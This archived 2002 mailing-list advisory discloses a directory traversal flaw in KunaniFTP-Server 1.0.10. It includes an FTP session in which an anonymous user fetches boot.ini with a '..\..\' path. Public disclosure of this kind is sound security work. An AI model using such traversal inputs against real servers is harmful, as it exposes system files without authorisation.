KunaniFTP-Server v.1.0.10 allows dictionary traversal

From: Zero-X www.lobnan.de Team (zero-xat_private)
Date: Tue Dec 10 2002 - 14:23:24 PST

Next message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-058.0] Linux: buffer overflow in nss_ldap DNS SRV"

Previous message: Seth Knox: "RE: Sygate Personal Firewall can be shut down without a need to s upply a password - although one is required"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

KunaniFTP-Server v.1.0.10 allows dictionary traversal:

Some ftp-commands in KunaniFTP-Server allows dictionary traversal.

Example:
######################################################
Verbindung mit server.
220 Kunani FTP Server Ready  ( www.kunani.com )
Benutzer (server:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get ..\..\..\..\..\boot.ini
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
#####################################################

Sorry for my very bad english. *g*

~~ Zero X, member of www.lobnan.de ~~
-- 
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze

Next message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-058.0] Linux: buffer overflow in nss_ldap DNS SRV"
Previous message: Seth Knox: "RE: Sygate Personal Firewall can be shut down without a need to s upply a password - although one is required"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Dec 10 2002 - 17:39:36 PST